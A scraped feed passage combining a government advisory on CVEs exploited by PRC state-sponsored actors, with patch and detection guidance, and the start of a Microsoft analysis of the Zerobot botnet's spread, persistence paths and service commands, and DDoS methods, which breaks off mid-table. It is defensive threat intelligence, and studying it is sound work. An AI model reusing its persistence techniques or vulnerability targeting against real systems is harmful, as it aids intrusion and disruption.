vulnerabilities and use publicly available tools to target networks of interest. NSA, CISA, and FBI assess PRC state-sponsored cyber actors have actively targeted U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks. See Table 1 for the top used CVEs.\n\n_Table I: Top CVEs most used by Chinese state-sponsored cyber actors since 2020_\n\nVendor\n\n| \n\nCVE\n\n| \n\nVulnerability Type \n \n---|---|--- \n \nApache Log4j\n\n| \n\nCVE-2021-44228\n\n| \n\nRemote Code Execution \n \nPulse Connect Secure\n\n| \n\nCVE-2019-11510\n\n| \n\nArbitrary File Read \n \nGitLab CE/EE\n\n| \n\nCVE-2021-22205\n\n| \n\nRemote Code Execution \n \nAtlassian\n\n| \n\nCVE-2022-26134\n\n| \n\nRemote Code Execution \n \nMicrosoft Exchange\n\n| \n\nCVE-2021-26855\n\n| \n\nRemote Code Execution \n \nF5 Big-IP\n\n| \n\nCVE-2020-5902\n\n| \n\nRemote Code Execution \n \nVMware vCenter Server\n\n| \n\nCVE-2021-22005\n\n| \n\nArbitrary File Upload \n \nCitrix ADC\n\n| \n\nCVE-2019-19781\n\n| \n\nPath Traversal \n \nCisco Hyperflex\n\n| \n\nCVE-2021-1497\n\n| \n\nCommand Line Execution \n \nBuffalo WSR\n\n| \n\nCVE-2021-20090\n\n| \n\nRelative Path Traversal \n \nAtlassian Confluence Server and Data Center\n\n| \n\nCVE-2021-26084\n\n| \n\nRemote Code Execution \n \nHikvision Webserver\n\n| \n\nCVE-2021-36260\n\n| \n\nCommand Injection \n \nSitecore XP\n\n| \n\nCVE-2021-42237\n\n| \n\nRemote Code Execution \n \nF5 Big-IP\n\n| \n\nCVE-2022-1388\n\n| \n\nRemote Code Execution \n \nApache\n\n| \n\nCVE-2022-24112\n\n| \n\nAuthentication Bypass by Spoofing \n \nZOHO\n\n| \n\nCVE-2021-40539\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-26857\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-26858\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-27065\n\n| \n\nRemote Code Execution \n \nApache HTTP Server\n\n| \n\nCVE-2021-41773\n\n| \n\nPath Traversal \n \nThese state-sponsored actors continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access. Many of the CVEs indicated in Table 1 allow the actors to surreptitiously gain unauthorized access into sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks. For additional information on PRC state-sponsored cyber actors targeting network devices, please see [People\u2019s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3055748/nsa-cisa-and-fbi-expose-prc-state-sponsored-exploitation-of-network-providers-d/>).\n\n### Mitigations\n\nNSA, CISA, and FBI urge organizations to apply the recommendations below and those listed in Appendix A.\n\n * Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n * Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices.\n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\n\n## Appendix A\n\n_Table II: Apache CVE-2021-44228_\n\nApache CVE-2021-44228 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nApache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against malicious actor controlled LDAP and other JNDI related endpoints. A malicious actor who can control log messages or log message parameters could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * See vendor\u2019s [Guidance For Preventing, Detecting, and Hunting for Exploitation of the Log4j 2 Vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>). \n \n_Vulnerable Technologies and Versions_\n\nThere are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, check <https://nvd.nist.gov/vuln/detail/CVE-2021-44228>. \n \n_Table III: Pulse CVE-2019-11510_\n\nPulse CVE-2019-11510 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote malicious actor could send a specially crafted URI to perform an arbitrary file reading vulnerability. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * Use CISA\u2019s \u201cCheck Your Pulse\u201d Tool. \n \n_Vulnerable Technologies and Versions_\n\nPulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n \n_Table IV: GitLab CVE-2021-22205_\n\nGitLab CVE-2021-22205 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nAn issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files passed to a file parser, which resulted in a remote command execution. \n \n_Recommended Mitigations_\n\n * Update to 12.10.3, 13.9.6, and 13.8.8 for GitLab.\n * Hotpatch is available via GitLab. \n \n_Detection Methods_\n\n * Investigate logfiles.\n * Check GitLab Workhorse. \n \n_Vulnerable Technologies and Versions_\n\nGitlab CE/EE. \n \n_Table V: Atlassian CVE-2022-26134_\n\nAtlassian CVE-2022-26134 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that could allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, 7.13.0 before 7.13.7, 7.14.0 before 7.14.3, 7.15.0 before 7.15.2, 7.16.0 before 7.16.4, 7.17.0 before 7.17.4, and 7.18.0 before 7.18.1. \n \n_Recommended Mitigations_\n\n * Immediately block all Internet traffic to and from affected products AND apply the update per vendor instructions. \n * Ensure Internet-facing servers are up-to-date and have secure compliance practices. \n * Short term workaround is provided [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAll supported versions of Confluence Server and Data Center\n\nConfluence Server and Data Center versions after 1.3.0 \n \n_Table VI: Microsoft CVE-2021-26855_\n\nMicrosoft CVE-2021-26855 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft has released security updates for Windows Exchange Server. To exploit these vulnerabilities, an authenticated malicious actor could send malicious requests to an affected server. A malicious actor who successfully exploited these vulnerabilities would execute arbitrary code and compromise the affected systems. If successfully exploited, these vulnerabilities could allow an adversary to obtain access to sensitive information, bypass security restrictions, cause a denial of service conditions, and/or perform unauthorized actions on the affected Exchange server, which could aid in further malicious activity. \n \n_Recommended Mitigations_\n\n * Apply the appropriate Microsoft Security Update.\n * Microsoft Exchange Server 2013 Cumulative Update 23 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 18 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 19 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 7 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 8 (KB5000871)\n * Restrict untrusted connections. \n \n_Detection Methods_\n\n * Analyze Exchange product logs for evidence of exploitation.\n * Scan for known webshells. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange 2013, 2016, and 2019. \n \n_Table VII: F5 CVE-2020-5902_\n\nF5 CVE-2020-5902 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. \n \n_Recommended Mitigations_\n\n * Apply FY BIG-IP Update.\n * Restrict access to the configuration utility. \n \n_Detection Methods_\n\n * Use F5\u2019s [CVE-2020-5902 IoC Detection Tool](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>).\n * Additional detection methods can be found at <https://support.f5.com/csp/article/K52145254>. \n \n_Vulnerable Technologies and Versions_\n\nF5 Big-IP Access Policy Manager\n\nF5 Big-IP Advanced Firewall Manager\n\nF5 Big-IP Advanced Web Application Firewall\n\nF5 Big-IP Analytics\n\nF5 Big-IP Application Acceleration Manager\n\nF5 Big-IP Application Security Manager\n\nF5 Big-IP Ddos Hybrid Defender\n\nF5 Big-IP Domain Name System (DNS)\n\nF5 Big-IP Fraud Protection Service (FPS)\n\nF5 Big-IP Global Traffic Manager (GTM)\n\nF5 Big-IP Link Controller\n\nF5 Networks Big-IP Local Traffic Manager (LTM)\n\nF5 Big-IP Policy Enforcement Manager (PEM)\n\nF5 SSL Orchestrator \n \n_References_\n\n<https://support.f5.com/csp/article/K00091341>\n\n<https://support.f5.com/csp/article/K07051153>\n\n<https://support.f5.com/csp/article/K20346072>\n\n<https://support.f5.com/csp/article/K31301245>\n\n<https://support.f5.com/csp/article/K33023560>\n\n<https://support.f5.com/csp/article/K43638305>\n\n<https://support.f5.com/csp/article/K52145254>\n\n<https://support.f5.com/csp/article/K82518062> \n \n_Table VIII: VMware CVE-2021-22005_\n\nVMware CVE-2021-22005 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThe vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. \n \n_Recommended Mitigations_\n\n * Apply Vendor Updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVMware Cloud Foundation\n\nVMware VCenter Server \n \n_Table IX: Citrix CVE-2019-19781_\n\nCitrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n \n_Recommended Mitigations_\n\n * Apply vendor [mitigations](<https://support.citrix.com/article/CTX267679/mitigation-steps-for-cve201919781>).\n * Use the CTX269180 - [CVE-2019-19781 Verification Tool](<https://support.citrix.com/article/CTX269180/cve201919781-verification-tool>) provided by Citrix. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nCitrix ADC, Gateway, and SD-WAN WANOP \n \n_Table X: Cisco CVE-2021-1497_\n\nCisco CVE-2021-1497 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMultiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote malicious actor to perform a command injection against an affected device. For more information about these vulnerabilities, see the Technical details section of this advisory. \n \n_Recommended Mitigations_\n\n * Apply Cisco software updates. \n \n_Detection Methods_\n\n * Look at the Snort [Rules](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR#details>) provided by Cisco. \n \n_Vulnerable Technologies and Versions_\n\nCisco Hyperflex Hx Data Platform 4.0(2A) \n \n_Table XI: Buffalo CVE-2021-20090_\n\nBuffalo CVE-2021-20090 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version &lt;= 1.02 and WSR-2533DHP3 firmware version &lt;= 1.24 could allow unauthenticated remote malicious actors to bypass authentication. \n \n_Recommended Mitigations_\n\n * Update firmware to latest available version. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nBuffalo Wsr-2533Dhpl2-Bk Firmware\n\nBuffalo Wsr-2533Dhp3-Bk Firmware \n \n_Table XII: Atlassian CVE-2021-26084_\n\nAtlassian CVE-2021-26084 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23 and from version 6.14.0 before 7.4.11, version 7.5.0 before 7.11.6, and version 7.12.0 before 7.12.5. \n \n_Recommended Mitigations_\n\n * Update confluence version to 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0.\n * Avoid using end-of-life devices.\n * Use Intrusion Detection Systems (IDS). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAtlassian Confluence\n\nAtlassian Confluence Server\n\nAtlassian Data Center\n\nAtlassian Jira Data Center \n \n_Table XIII: Hikvision CVE-2021-36260_\n\nHikvision CVE-2021-36260 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A command injection vulnerability exists in the web server of some Hikvision products. Due to the insufficient input validation, a malicious actor can exploit the vulnerability to launch a command injection by sending some messages with malicious commands. \n \n_Recommended Mitigations_\n\n * Apply the latest firmware updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVarious Hikvision Firmware to include Ds, Ids, and Ptz \n \n_References_\n\n<https://www.cisa.gov/uscert/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260> \n \n_Table XIV: Sitecore CVE-2021-42237_\n\nSitecore CVE-2021-42237 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nSitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability. \n \n_Recommended Mitigations_\n\n * Update to latest version.\n * Delete the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nSitecore Experience Platform 7.5, 7.5 Update 1, and 7.5 Update 2\n\nSitecore Experience Platform 8.0, 8.0 Service Pack 1, and 8.0 Update 1-Update 7\n\nSitecore Experience Platform 8.0 Service Pack 1\n\nSitecore Experience Platform 8.1, and Update 1-Update 3\n\nSitecore Experience Platform 8.2, and Update 1-Update 7 \n \n_Table XV: F5 CVE-2022-1388_\n\nF5 CVE-2022-1388 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. \n \n_Recommended Mitigations_\n\n * Block iControl REST access through the self IP address.\n * Block iControl REST access through the management interface.\n * Modify the BIG-IP httpd configuration. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nBig IP versions:\n\n16.1.0-16.1.2\n\n15.1.0-15.1.5\n\n14.1.0-14.1.4\n\n13.1.0-13.1.4\n\n12.1.0-12.1.6\n\n11.6.1-11.6.5 \n \n_Table XVI: Apache CVE-2022-24112_\n\nApache CVE-2022-24112 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA malicious actor can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. \n \n_Recommended Mitigations_\n\n * In affected versions of Apache APISIX, you can avoid this risk by explicitly commenting out batch-requests in the conf/config.yaml and conf/config-default.yaml files and restarting Apache APISIX.\n * Update to 2.10.4 or 2.12.1. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nApache APISIX between 1.3 and 2.12.1 (excluding 2.12.1)\n\nLTS versions of Apache APISIX between 2.10.0 and 2.10.4 \n \n_Table XVII: ZOHO CVE-2021-40539_\n\nZOHO CVE-2021-40539 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nZoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. \n \n_Recommended Mitigations_\n\n * Upgrade to latest version. \n \n_Detection Methods_\n\n * Run ManageEngine\u2019s detection tool.\n * Check for specific files and [logs](<https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html>). \n \n_Vulnerable Technologies and Versions_\n\nZoho Corp ManageEngine ADSelfService Plus \n \n_Table XVIII: Microsoft CVE-2021-26857_\n\nMicrosoft CVE-2021-26857 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: https://github.com/microsoft/CSS-Exchange/tree/main/Security.\n * Hashes can be found here: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XIX: Microsoft CVE-2021-26858_\n\nMicrosoft CVE-2021-26858 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XX: Microsoft CVE-2021-27065_\n\nMicrosoft CVE-2021-27065 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_References_\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065> \n \n_Table XXI: Apache CVE-2021-41773_\n\nApache CVE-2021-41773 CVSS 3.0: 7.5 (High) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. A malicious actor could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied,\" these requests can succeed. Enabling CGI scripts for these aliased paths could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 is incomplete (see CVE-2021-42013). \n \n_Recommended Mitigations_\n\n * Apply update or patch. \n \n_Detection Methods_\n\n * Commercially available scanners can detect CVE. \n \n_Vulnerable Technologies and Versions_\n\nApache HTTP Server 2.4.49 and 2.4.50\n\nFedoraproject Fedora 34 and 35\n\nOracle Instantis Enterprise Track 17.1-17.3\n\nNetapp Cloud Backup \n \n### Revisions\n\nInitial Publication: October 6, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-06T12:00:00", "type": "ics", "title": "Top CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-06T12:00:00", "id": "AA22-279A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-279a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-12-21T20:16:24", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continue to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh _that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe)_. Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop._\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. \nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. \nHTTP_HANDLE| Sends HTTP GET requests using a Golang standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. 